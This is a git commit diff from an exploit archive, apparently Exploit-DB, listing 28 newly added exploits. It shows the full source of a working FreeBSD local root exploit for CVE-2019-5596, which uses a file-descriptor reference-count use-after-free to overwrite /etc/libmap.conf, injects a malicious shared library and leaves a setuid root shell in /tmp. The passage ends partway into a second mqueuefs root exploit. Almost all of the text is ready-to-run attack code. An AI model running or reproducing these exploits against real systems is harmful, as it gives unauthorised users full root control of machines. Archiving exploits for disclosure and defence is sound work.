DB: 2019-12-31
28 changes to exploits/shellcodes OpenBSD - Dynamic Loader chpass Privilege Escalation (Metasploit) Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit) Microsoft UPnP - Local Privilege Elevation (Metasploit) AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC) FTP Navigator 8.03 - Stack Overflow (SEH) Wing FTP Server 6.0.7 - Unquoted Service Path Domain Quester Pro 6.02 - Stack Overflow (SEH) FreeBSD-SA-19:02.fd - Privilege Escalation FreeBSD-SA-19:15.mqueuefs - Privilege Escalation HomeAutomation 3.3.2 - Persistent Cross-Site Scripting HomeAutomation 3.3.2 - Authentication Bypass HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin) HomeAutomation 3.3.2 - Remote Code Execution elearning-script 1.0 - Authentication Bypass XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin) Thrive Smart Home 1.1 - Authentication Bypass XEROX WorkCentre 7855 Printer - Cross-Site Request Forgery (Add Admin) XEROX WorkCentre 7830 Printer - Cross-Site Request Forgery (Add Admin) WEMS BEMS 21.3.1 - Undocumented Backdoor Account AVE DOMINAplus 1.10.x - Credential Disclosure AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm) AVE DOMINAplus 1.10.x - Authentication Bypass Heatmiser Netmonitor 3.03 - Hardcoded Credentials MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure RICOH SP 4510SF Printer - HTML Injection RICOH Web Image Monitor 1.09 - HTML Injection Heatmiser Netmonitor 3.03 - HTML Injection
This commit is contained in:
parent
0db40c5558
commit
cd36764b57
29 changed files with 3916 additions and 0 deletions
677
exploits/freebsd/local/47829.sh
Executable file
677
exploits/freebsd/local/47829.sh
Executable file
|
@ -0,0 +1,677 @@
|
|||
# Exploit: FreeBSD-SA-19:02.fd - Privilege Escalation
|
||||
# Date: 2019-12-30
|
||||
# Author: Karsten König of Secfault Security
|
||||
# Twitter: @gr4yf0x
|
||||
# Kudos: Maik, greg and Dirk for discussion and inspiration
|
||||
# CVE: CVE-2019-5596
|
||||
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
|
||||
|
||||
#!/bin/sh
|
||||
|
||||
echo "[+] Root Exploit for FreeBSD-SA-19:02.fd by Secfault Security"
|
||||
|
||||
umask 0000
|
||||
|
||||
if [ ! -f /etc/libmap.conf ]; then
|
||||
echo "[!] libmap.conf has to exist"
|
||||
exit
|
||||
fi
|
||||
|
||||
cp /etc/libmap.conf ./
|
||||
|
||||
cat > heavy_cyber_weapon.c << EOF
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <pthread.h>
|
||||
#include <pthread_np.h>
|
||||
#include <signal.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/cpuset.h>
|
||||
#include <sys/event.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/sysctl.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/un.h>
|
||||
|
||||
#define N_FDS 0xfe
|
||||
#define N_OPEN 0x2
|
||||
|
||||
#define N 1000000
|
||||
#define NUM_THREADS 400
|
||||
#define NUM_FORKS 3
|
||||
#define FILE_SIZE 1024
|
||||
#define CHUNK_SIZE 1
|
||||
#define N_FILES 25
|
||||
|
||||
#define SERVER_PATH "/tmp/sync_forks"
|
||||
#define DEFAULT_PATH "/tmp/pwn"
|
||||
#define HAMMER_PATH "/tmp/pwn2"
|
||||
#define ATTACK_PATH "/etc/libmap.conf"
|
||||
|
||||
#define HOOK_LIB "libutil.so.9"
|
||||
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
|
||||
|
||||
#define CORE_0 0
|
||||
#define CORE_1 1
|
||||
|
||||
#define MAX_TRIES 500
|
||||
|
||||
struct thread_data {
|
||||
int fd;
|
||||
int fd2;
|
||||
};
|
||||
|
||||
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
|
||||
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
|
||||
|
||||
int send_recv(int fd, int sv[2], int n_fds) {
|
||||
int ret, i;
|
||||
struct iovec iov;
|
||||
struct msghdr msg;
|
||||
struct cmsghdr *cmh;
|
||||
char cmsg[CMSG_SPACE(sizeof(int)*n_fds)];
|
||||
int *fds; char buf[1];
|
||||
|
||||
iov.iov_base = "a";
|
||||
iov.iov_len = 1;
|
||||
|
||||
msg.msg_name = NULL;
|
||||
msg.msg_namelen = 0;
|
||||
msg.msg_iov = &iov;
|
||||
msg.msg_iovlen = 1;
|
||||
msg.msg_control = cmsg;
|
||||
msg.msg_controllen = CMSG_LEN(sizeof(int)*n_fds);
|
||||
msg.msg_flags = 0;
|
||||
|
||||
cmh = CMSG_FIRSTHDR(&msg);
|
||||
cmh->cmsg_len = CMSG_LEN(sizeof(int)*n_fds);
|
||||
cmh->cmsg_level = SOL_SOCKET;
|
||||
cmh->cmsg_type = SCM_RIGHTS;
|
||||
fds = (int *)CMSG_DATA(cmsg);
|
||||
for (i = 0; i < n_fds; i++) {
|
||||
fds[i] = fd;
|
||||
}
|
||||
|
||||
ret = sendmsg(sv[0], &msg, 0);
|
||||
if (ret == -1) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
iov.iov_base = buf;
|
||||
msg.msg_name = NULL;
|
||||
msg.msg_namelen = 0;
|
||||
msg.msg_iov = &iov;
|
||||
msg.msg_iovlen = 1;
|
||||
msg.msg_control = cmh;
|
||||
msg.msg_controllen = CMSG_SPACE(0);
|
||||
msg.msg_flags = 0;
|
||||
|
||||
ret = recvmsg(sv[1], &msg, 0);
|
||||
if (ret == -1) {
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
int open_tmp(char *path)
|
||||
{
|
||||
int fd;
|
||||
char *real_path;
|
||||
|
||||
if (path != NULL) {
|
||||
real_path = malloc(strlen(path) + 1);
|
||||
strcpy(real_path, path);
|
||||
}
|
||||
else {
|
||||
real_path = malloc(strlen(DEFAULT_PATH) + 1);
|
||||
strcpy(real_path, DEFAULT_PATH);
|
||||
}
|
||||
|
||||
if ((fd = open(real_path, O_RDWR | O_CREAT)) == -1) {
|
||||
perror("[!] open");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
fchmod(fd, 0700);
|
||||
|
||||
return fd;
|
||||
}
|
||||
|
||||
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
|
||||
bzero(remote, sizeof(struct sockaddr_un));
|
||||
remote->sun_family = AF_UNIX;
|
||||
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
|
||||
}
|
||||
|
||||
int bind_domain_socket(struct sockaddr_un *remote) {
|
||||
int server_socket;
|
||||
|
||||
if ((server_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
|
||||
perror("[!] socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if (bind(server_socket,
|
||||
(struct sockaddr *) remote,
|
||||
sizeof(struct sockaddr_un)) != 0) {
|
||||
perror("[!] bind");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return server_socket;
|
||||
}
|
||||
|
||||
int connect_domain_socket_client() {
|
||||
int client_socket;
|
||||
|
||||
if ((client_socket = socket(AF_UNIX, SOCK_DGRAM, 0)) == -1) {
|
||||
perror("[!] socket");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
return client_socket;
|
||||
}
|
||||
|
||||
// Prevent panic at termination because f_count of the
|
||||
// corrupted struct file is 0 at the moment this function
|
||||
// is used but fd2 still points to the struct, hence fdrop()
|
||||
// is called at exit and will panic because f_count will
|
||||
// be below 0
|
||||
//
|
||||
// So we just use our known primitive to increase f_count
|
||||
void prevent_panic(int sv[2], int fd)
|
||||
{
|
||||
send_recv(fd, sv, 0xfe);
|
||||
}
|
||||
|
||||
int stick_thread_to_core(int core) {
|
||||
/* int num_cores = sysconf(_SC_NPROCESSORS_ONLN); */
|
||||
/* if (core_id < 0 || core_id >= num_cores) */
|
||||
/* return EINVAL; */
|
||||
cpuset_t cpuset;
|
||||
CPU_ZERO(&cpuset);
|
||||
CPU_SET(core, &cpuset);
|
||||
|
||||
pthread_t current_thread = pthread_self();
|
||||
return pthread_setaffinity_np(current_thread, sizeof(cpuset_t), &cpuset);
|
||||
}
|
||||
|
||||
void *trigger_uaf(void *thread_args) {
|
||||
struct thread_data *thread_data;
|
||||
int fd, fd2;
|
||||
|
||||
if (stick_thread_to_core(CORE_0) != 0) {
|
||||
perror("[!] [!] trigger_uaf: Could not stick thread to core");
|
||||
}
|
||||
|
||||
thread_data = (struct thread_data *)thread_args;
|
||||
fd = thread_data->fd;
|
||||
fd2 = thread_data->fd2;
|
||||
|
||||
printf("[+] trigger_uaf: fd: %d\n", fd);
|
||||
printf("[+] trigger_uaf: fd2: %d\n", fd2);
|
||||
|
||||
printf("[+] trigger_uaf: Waiting for start signal from monitor\n");
|
||||
pthread_mutex_lock(&trigger_mtx);
|
||||
pthread_cond_wait(&trigger_cond, &trigger_mtx);
|
||||
|
||||
usleep(40);
|
||||
|
||||
// Close to fds to trigger uaf
|
||||
//
|
||||
// This assumes that fget_write() in kern_writev()
|
||||
// was already successful!
|
||||
//
|
||||
// Otherwise kernel panic is triggered
|
||||
//
|
||||
// refcount = 2 (primitive+fget_write)
|
||||
close(fd);
|
||||
close(fd2);
|
||||
// refcount = 0 => free
|
||||
fd = open(ATTACK_PATH, O_RDONLY);
|
||||
// refcount = 1
|
||||
|
||||
printf("[+] trigger_uaf: Opened read-only file, now hope\n");
|
||||
printf("[+] trigger_uaf: Exit\n");
|
||||
|
||||
pthread_exit(NULL);
|
||||
}
|
||||
|
||||
void *hammer(void *arg) {
|
||||
int i, j, k, client_socket, ret;
|
||||
char buf[FILE_SIZE], sync_buf[3];
|
||||
FILE *fd[N_FILES];
|
||||
struct sockaddr_un remote;
|
||||
|
||||
prepare_domain_socket(&remote, SERVER_PATH);
|
||||
client_socket = connect_domain_socket_client();
|
||||
strncpy(sync_buf, "1\n", 3);
|
||||
|
||||
for (i = 0; i < N_FILES; i++) {
|
||||
unlink(HAMMER_PATH);
|
||||
if ((fd[i] = fopen(HAMMER_PATH, "w+")) == NULL) {
|
||||
perror("[!] fopen");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
for (i = 0; i < FILE_SIZE; i++) {
|
||||
buf[i] = 'a';
|
||||
}
|
||||
|
||||
pthread_mutex_lock(&hammer_mtx);
|
||||
|
||||
// Sometimes sendto() fails because
|
||||
// no free buffer is available
|
||||
for (;;) {
|
||||
if (sendto(client_socket,
|
||||
sync_buf,
|
||||
strlen(sync_buf), 0,
|
||||
(struct sockaddr *) &remote,
|
||||
sizeof(remote)) != -1) {
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_cond_wait(&hammer_cond, &hammer_mtx);
|
||||
pthread_mutex_unlock(&hammer_mtx);
|
||||
|
||||
for (i = 0; i < N; i++) {
|
||||
for (k = 0; k < N_FILES; k++) {
|
||||
rewind(fd[k]);
|
||||
}
|
||||
for (j = 0; j < FILE_SIZE*FILE_SIZE; j += CHUNK_SIZE) {
|
||||
for (k = 0; k < N_FILES; k++) {
|
||||
if (fwrite(&buf[j % FILE_SIZE], sizeof(char), CHUNK_SIZE, fd[k]) < 0) {
|
||||
perror("[!] fwrite");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
fflush(NULL);
|
||||
}
|
||||
}
|
||||
|
||||
pthread_exit(NULL);
|
||||
}
|
||||
|
||||
// Works on UFS only
|
||||
void *monitor_dirty_buffers(void *arg) {
|
||||
int hidirtybuffers, numdirtybuffers;
|
||||
size_t len;
|
||||
|
||||
len = sizeof(int);
|
||||
|
||||
if (sysctlbyname("vfs.hidirtybuffers", &hidirtybuffers, &len, NULL, 0) != 0) {
|
||||
perror("[!] sysctlbyname hidirtybuffers");
|
||||
exit(1);
|
||||
};
|
||||
printf("[+] monitor: vfs.hidirtybuffers: %d\n", hidirtybuffers);
|
||||
|
||||
while(1) {
|
||||
sysctlbyname("vfs.numdirtybuffers", &numdirtybuffers, &len, NULL, 0);
|
||||
if (numdirtybuffers >= hidirtybuffers) {
|
||||
pthread_cond_signal(&write_cond);
|
||||
pthread_cond_signal(&trigger_cond);
|
||||
printf("[+] monitor: Reached hidirtybuffers watermark\n");
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
pthread_exit(NULL);
|
||||
}
|
||||
|
||||
int check_write(int fd) {
|
||||
char buf[256];
|
||||
int nbytes;
|
||||
struct stat st;
|
||||
|
||||
printf("[+] check_write\n");
|
||||
stat(DEFAULT_PATH, &st);
|
||||
printf("[+] %s size: %ld\n", DEFAULT_PATH, st.st_size);
|
||||
|
||||
stat(ATTACK_PATH, &st);
|
||||
printf("[+] %s size: %ld\n", ATTACK_PATH, st.st_size);
|
||||
|
||||
nbytes = read(fd, buf, strlen(HOOK_LIB));
|
||||
printf("[+] Read bytes: %d\n", nbytes);
|
||||
if (nbytes > 0 && strncmp(buf, HOOK_LIB, strlen(HOOK_LIB)) == 0) {
|
||||
return 1;
|
||||
}
|
||||
else if (nbytes < 0) {
|
||||
perror("[!] check_write:read");
|
||||
printf("[!] check_write:Cannot check if it worked!");
|
||||
return 1;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
void *write_to_file(void *thread_args) {
|
||||
int fd, fd2, nbytes;
|
||||
int *fd_ptr;
|
||||
char buf[256];
|
||||
struct thread_data *thread_data;
|
||||
|
||||
if (stick_thread_to_core(CORE_1) != 0) {
|
||||
perror("[!] write_to_file: Could not stick thread to core");
|
||||
}
|
||||
|
||||
fd_ptr = (int *) malloc(sizeof(int));
|
||||
|
||||
thread_data = (struct thread_data *)thread_args;
|
||||
fd = thread_data->fd;
|
||||
fd2 = open(ATTACK_PATH, O_RDONLY);
|
||||
|
||||
printf("[+] write_to_file: Wait for signal from monitor\n");
|
||||
pthread_mutex_lock(&write_mtx);
|
||||
pthread_cond_wait(&write_cond, &write_mtx);
|
||||
|
||||
snprintf(buf, 256, "%s %s\n#", HOOK_LIB, ATTACK_LIB);
|
||||
nbytes = write(fd, buf, strlen(buf));
|
||||
|
||||
// Reopen directly after write to prevent panic later
|
||||
//
|
||||
// After the write f_count == 0 because after trigger_uaf()
|
||||
// opened the read-only file, f_count == 1 and write()
|
||||
// calls fdrop() at the end
|
||||
//
|
||||
// => f_count == 0
|
||||
//
|
||||
// A direct open hopefully assigns the now again free file
|
||||
// object to fd so that we can prevent the panic with our
|
||||
// increment primitive.
|
||||
if ((fd = open_tmp(NULL)) == -1)
|
||||
perror("[!] write_to_file: open_tmp");
|
||||
*fd_ptr = fd;
|
||||
|
||||
if (nbytes < 0) {
|
||||
perror("[!] [!] write_to_file:write");
|
||||
} else if (nbytes > 0) {
|
||||
printf("[+] write_to_file: We have written something...\n");
|
||||
if (check_write(fd2) > 0)
|
||||
printf("[+] write_to_file: It (probably) worked!\n");
|
||||
else
|
||||
printf("[!] write_to_file: It worked not :(\n");
|
||||
}
|
||||
|
||||
printf("[+] write_to_file: Exit\n");
|
||||
pthread_exit(fd_ptr);
|
||||
}
|
||||
|
||||
void prepare(int sv[2], int fds[2]) {
|
||||
int fd, fd2, i;
|
||||
|
||||
printf("[+] Start UaF preparation\n");
|
||||
printf("[+] This can take a while\n");
|
||||
|
||||
// Get a single file descriptor to send via the socket
|
||||
if ((fd = open_tmp(NULL)) == -1) {
|
||||
perror("[!] open_tmp");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
if ((fd2 = dup(fd)) == -1) {
|
||||
perror("[!] dup");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
// fp->f_count will increment by 0xfe in one iteration
|
||||
// doing this 16909320 times will lead to
|
||||
// f_count = 16909320 * 0xfe + 2 = 0xfffffff2
|
||||
// Note the 2 because of the former call of dup() and
|
||||
// the first open().
|
||||
//
|
||||
// To test our trigger we can send 0xd more fd's what
|
||||
// would to an f_count of 0 when fdclose() is called in
|
||||
// m_dispose_extcontrolm. fdrop() will reduce f_count to
|
||||
// 0xffffffff = -1 and ultimately panic when _fdrop() is
|
||||
// called because the latter asserts that f_count is 0.
|
||||
// _fdrop is called in the first place because
|
||||
// refcount_release() only checks that f_count is less or
|
||||
// equal 1 to recognize the last reference.
|
||||
//
|
||||
// If we want to trigger the free without panic, we have
|
||||
// to send 0xf fds and close an own what will lead to an
|
||||
// fdrop() call without panic as f_count is 1 and reduced
|
||||
// to 0 by close(). The unclosed descriptor references now
|
||||
// a free 'struct file'.
|
||||
for (i = 0; i < 16909320; i++) {
|
||||
if (i % 1690930 == 0) {
|
||||
printf("[+] Progress: %d%%\n", (u_int32_t) (i / 169093));
|
||||
}
|
||||
|
||||
if (send_recv(fd, sv, N_FDS)) {
|
||||
perror("[!] prepare:send_recv");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
if (send_recv(fd, sv, 0xf)) {
|
||||
perror("[!] prepare:send_recv");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
fds[0] = fd;
|
||||
fds[1] = fd2;
|
||||
|
||||
printf("[+] Finished UaF preparation\n");
|
||||
}
|
||||
|
||||
void read_thread_status(int server_socket) {
|
||||
int bytes_rec, count;
|
||||
struct sockaddr_un client;
|
||||
socklen_t len;
|
||||
char buf[256];
|
||||
struct timeval tv;
|
||||
|
||||
tv.tv_sec = 10;
|
||||
tv.tv_usec = 0;
|
||||
setsockopt(server_socket,
|
||||
SOL_SOCKET, SO_RCVTIMEO,
|
||||
(const char*)&tv, sizeof tv);
|
||||
|
||||
for (count = 0; count < NUM_FORKS*NUM_THREADS; count++) {
|
||||
if (count % 100 == 0) {
|
||||
printf("[+] Hammer threads ready: %d\n", count);
|
||||
}
|
||||
bzero(&client, sizeof(struct sockaddr_un));
|
||||
bzero(buf, 256);
|
||||
|
||||
len = sizeof(struct sockaddr_un);
|
||||
if ((bytes_rec = recvfrom(server_socket,
|
||||
buf, 256, 0,
|
||||
(struct sockaddr *) &client,
|
||||
&len)) == -1) {
|
||||
perror("[!] recvfrom");
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
if (count != NUM_FORKS * NUM_THREADS) {
|
||||
printf("[!] Could not create all hammer threads, will try though!\n");
|
||||
}
|
||||
}
|
||||
|
||||
void fire() {
|
||||
int i, j, fd, fd2, bytes_rec, server_socket;
|
||||
int sv[2], fds[2], hammer_socket[NUM_FORKS];
|
||||
int *fd_ptr;
|
||||
char socket_path[256], sync_buf[3], buf[256];
|
||||
pthread_t write_thread, trigger_thread, monitor_thread;
|
||||
pthread_t hammer_threads[NUM_THREADS];
|
||||
pid_t pids[NUM_FORKS];
|
||||
socklen_t len;
|
||||
struct thread_data thread_data;
|
||||
struct sockaddr_un server, client;
|
||||
struct sockaddr_un hammer_socket_addr[NUM_FORKS];
|
||||
|
||||
// Socket for receiving thread status
|
||||
unlink(SERVER_PATH);
|
||||
prepare_domain_socket(&server, SERVER_PATH);
|
||||
server_socket = bind_domain_socket(&server);
|
||||
|
||||
// Sockets to receive hammer signal
|
||||
for (i = 0; i < NUM_FORKS; i++) {
|
||||
snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i);
|
||||
unlink(socket_path);
|
||||
prepare_domain_socket(&hammer_socket_addr[i], socket_path);
|
||||
hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]);
|
||||
}
|
||||
|
||||
strncpy(sync_buf, "1\n", 3);
|
||||
len = sizeof(struct sockaddr_un);
|
||||
|
||||
if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) {
|
||||
perror("[!] socketpair");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
pthread_mutex_init(&write_mtx, NULL);
|
||||
pthread_mutex_init(&trigger_mtx, NULL);
|
||||
pthread_cond_init(&write_cond, NULL);
|
||||
pthread_cond_init(&trigger_cond, NULL);
|
||||
|
||||
pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL);
|
||||
|
||||
prepare(sv, fds);
|
||||
fd = fds[0];
|
||||
fd2 = fds[1];
|
||||
|
||||
thread_data.fd = fd;
|
||||
thread_data.fd2 = fd2;
|
||||
pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data);
|
||||
pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data);
|
||||
|
||||
for (j = 0; j < NUM_FORKS; j++) {
|
||||
if ((pids[j] = fork()) < 0) {
|
||||
perror("[!] fork");
|
||||
abort();
|
||||
}
|
||||
else if (pids[j] == 0) {
|
||||
pthread_mutex_init(&hammer_mtx, NULL);
|
||||
pthread_cond_init(&hammer_cond, NULL);
|
||||
|
||||
close(fd);
|
||||
close(fd2);
|
||||
|
||||
/* Prevent that a file stream in the hammer threads
|
||||
* gets the file descriptor of fd for debugging purposes
|
||||
*/
|
||||
if ((fd = open_tmp("/tmp/dummy")) == -1)
|
||||
perror("[!] dummy");
|
||||
if ((fd2 = open_tmp("/tmp/dummy2")) == -1)
|
||||
perror("[!] dummy2");
|
||||
printf("[+] Fork %d fd: %d\n", j, fd);
|
||||
printf("[+] Fork %d fd2: %d\n", j, fd2);
|
||||
|
||||
for (i = 0; i < NUM_THREADS; i++) {
|
||||
pthread_create(&hammer_threads[i], NULL, hammer, NULL);
|
||||
}
|
||||
|
||||
printf("[+] Fork %d created all threads\n", j);
|
||||
|
||||
if ((bytes_rec = recvfrom(hammer_socket[j],
|
||||
buf, 256, 0,
|
||||
(struct sockaddr *) &client,
|
||||
&len)) == -1) {
|
||||
perror("[!] accept");
|
||||
abort();
|
||||
}
|
||||
|
||||
pthread_cond_broadcast(&hammer_cond);
|
||||
|
||||
for (i = 0; i < NUM_THREADS; i++) {
|
||||
pthread_join(hammer_threads[i], NULL);
|
||||
}
|
||||
|
||||
pthread_cond_destroy(&hammer_cond);
|
||||
pthread_mutex_destroy(&hammer_mtx);
|
||||
|
||||
exit(0);
|
||||
} else {
|
||||
printf("[+] Created child with PID %d\n", pids[j]);
|
||||
}
|
||||
}
|
||||
|
||||
read_thread_status(server_socket);
|
||||
printf("[+] Send signal to Start Hammering\n");
|
||||
for (i = 0; i < NUM_FORKS; i++) {
|
||||
if (sendto(hammer_socket[i],
|
||||
sync_buf,
|
||||
strlen(sync_buf), 0,
|
||||
(struct sockaddr *) &hammer_socket_addr[i],
|
||||
sizeof(hammer_socket_addr[0])) == -1) {
|
||||
perror("[!] sendto");
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
|
||||
pthread_join(monitor_thread, NULL);
|
||||
for (i = 0; i < NUM_FORKS; i++) {
|
||||
kill(pids[i], SIGKILL);
|
||||
printf("[+] Killed %d\n", pids[i]);
|
||||
}
|
||||
|
||||
pthread_join(write_thread, (void **) &fd_ptr);
|
||||
pthread_join(trigger_thread, NULL);
|
||||
|
||||
pthread_mutex_destroy(&write_mtx);
|
||||
pthread_mutex_destroy(&trigger_mtx);
|
||||
pthread_cond_destroy(&write_cond);
|
||||
pthread_cond_destroy(&trigger_cond);
|
||||
|
||||
printf("[+] Returned fd: %d\n", *fd_ptr);
|
||||
prevent_panic(sv, *fd_ptr);
|
||||
|
||||
// fd was acquired from write_to_file
|
||||
// which allocs a pointer for it
|
||||
free(fd_ptr);
|
||||
}
|
||||
|
||||
int main(int argc, char **argv)
|
||||
{
|
||||
setbuf(stdout, NULL);
|
||||
|
||||
fire();
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
EOF
|
||||
|
||||
cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c
|
||||
|
||||
cat > program.c << EOF
|
||||
#include <unistd.h>
|
||||
#include <stdio.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdlib.h>
|
||||
|
||||
void _init()
|
||||
{
|
||||
if (!geteuid())
|
||||
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
|
||||
}
|
||||
|
||||
EOF
|
||||
|
||||
cc -o program.o -c program.c -fPIC
|
||||
cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
|
||||
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
|
||||
|
||||
echo "[+] Firing the Heavy Cyber Weapon"
|
||||
./heavy_cyber_weapon
|
||||
su
|
||||
|
||||
if [ -f /tmp/xxxx ]; then
|
||||
echo "[+] Enjoy!"
|
||||
echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf"
|
||||
/tmp/xxxx
|
||||
else
|
||||
echo "[!] FAIL"
|
||||
fi
|
754
exploits/freebsd/local/47830.sh
Executable file
754
exploits/freebsd/local/47830.sh
Executable file
|
@ -0,0 +1,754 @@
|
|||
# Exploit: FreeBSD-SA-19:15.mqueuefs - Privilege Escalation
|
||||
# Author: Karsten König of Secfault Security
|
||||
# Date: 2019-12-30
|
||||
# Change line 719 to choose which vulnerability
|
||||
# is targeted
|
||||
#
|
||||
# libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper
|
||||
# Exploit for FreeBSD-SA-19:15.mqueuefs and
|
||||
# FreeBSD-SA-19:24.mqueu
|
||||
#!/bin/sh
|
||||
|
||||
echo "[+] Root Exploit for FreeBSD mqueuefs vulnerabilities"
|
||||
|
||||
umask 0000
|
||||
|
||||
# libmap.conf has to exist because it is
|
||||
# the attacked file
|
||||
if [ ! -f /etc/libmap.conf ]; then
|
||||
echo "[!] libmap.conf has to exist"
|
||||
exit
|
||||
fi
|
||||
|
||||
# Make a backup of the current libmap.conf
|
||||
# because it has to be reconstructed afterwards
|
||||
cp /etc/libmap.conf ./
|
||||
|
||||
# Write the exploit to a C file
|
||||
cat > exploit.c << EOF
|
||||
#include <errno.h>
|
||||
#include <fcntl.h>
|
||||
#include <pthread.h>
|
||||
#include <pthread_np.h>
|
||||
#include <signal.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/cpuset.h>
|
||||
#include <sys/event.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <sys/param.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/sysctl.h>
|
||||
#include <sys/_types.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/un.h>
|
||||
|
||||
#define N_OPEN 0x2
|
||||
|
||||
// Tweak NUM_THREADS and NUM_FORKS if
|
||||
// more RAM is available on the target
|
||||
//
|
||||
// These parameters were tested with
|
||||
// up to 16 GB of RAM on a dual-core
|
||||
// Intel based system
|
||||
#define N 1000000
|
||||
#define NUM_THREADS 600
|
||||
#define NUM_FORKS 3
|
||||
#define FILE_SIZE 1024
|
||||
#define CHUNK_SIZE 1
|
||||
#define N_FILES 25
|
||||
|
||||
// These are temporary files
|
||||
// which are created during
|
||||
// exploitation
|
||||
#define SERVER_PATH "/tmp/sync_forks"
|
||||
#define DEFAULT_PATH "/tmp/pwn"
|
||||
#define HAMMER_PATH "/tmp/pwn2"
|
||||
|
||||
// This is the attacked file
|
||||
#define ATTACK_PATH "/etc/libmap.conf"
|
||||
|
||||
// These are parameters from the attack script
|
||||
#define HOOK_LIB "libutil.so.9"
|
||||
#define ATTACK_LIB "/tmp/libno_ex.so.1.0"
|
||||
|
||||
// The exploit will stick some threads
|
||||
// to specific cores
|
||||
#define CORE_0 0
|
||||
#define CORE_1 1
|
||||
|
||||
// Syscalls from mqueuefs
|
||||
#define KMQ_OPEN 457
|
||||
#define KMQ_TIMEDSEND 460
|
||||
|
||||
// Taken from sys/mqueue.h
|
||||
struct mq_attr {
|
||||
long mq_flags;
|
||||
long mq_maxmsg;
|
||||
long mq_msgsize;
|
||||
long mq_curmsgs;
|
||||
long __reserved[4];
|
||||
};
|
||||
|
||||
struct thread_data {
|
||||
int fd;
|
||||
int fd2;
|
||||
};
|
||||
|
||||
pthread_mutex_t write_mtx, trigger_mtx, count_mtx, hammer_mtx;
|
||||
pthread_cond_t write_cond, trigger_cond, count_cond, hammer_cond;
|
||||
|
||||
// Both syscalls are indirectly called to be less reliable on
|
||||
// installed libraries
|
||||
int mq_open(const char *name, int oflag, mode_t mode,
|
||||
const struct mq_attr *attr)
|
||||
{
|
||||
int fd;
|
||||
fd = syscall(KMQ_OPEN, name, oflag, mode, attr);
|
||||
return fd;
|
||||
}
|
||||
|
||||
void mq_timedsend(int fd, char *buf, size_t len,
|
||||
unsigned prio, const struct timespec *timeout)
|
||||
{
|
||||
syscall(KMQ_TIMEDSEND, fd, buf, len, prio, timeout);
|
||||
}
|
||||
|
||||
// Convenience function to open temporary files
|
||||
int open_tmp(char *path)
|
||||
{
|
||||
int fd;
|
||||
char *real_path;
|
||||
|
||||
if (path != NULL) {
|
||||
real_path = malloc(strlen(path) + 1);
|
||||
strcpy(real_path, path);
|
||||
}
|
||||
else {
|
||||
real_path = malloc(strlen(DEFAULT_PATH) + 1);
|
||||
strcpy(real_path, DEFAULT_PATH);
|
||||
}
|
||||
|
||||
if ((fd = open(real_path, O_RDWR | O_CREAT, S_IRWXU)) == -1) {
|
||||
perror("[!] open");
|
||||
}
|
||||
|
||||
return fd;
|
||||
}
|
||||
|
||||
// Convenience function to prepare a UNIX domain socket
|
||||
void prepare_domain_socket(struct sockaddr_un *remote, char *path) {
|
||||
bzero(remote, sizeof(struct sockaddr_un));
|
||||
remote->sun_family = AF_UNIX;
|
||||
strncpy(remote->sun_path, path, sizeof(remote->sun_path));
|
||||
}
|
||||
|
||||
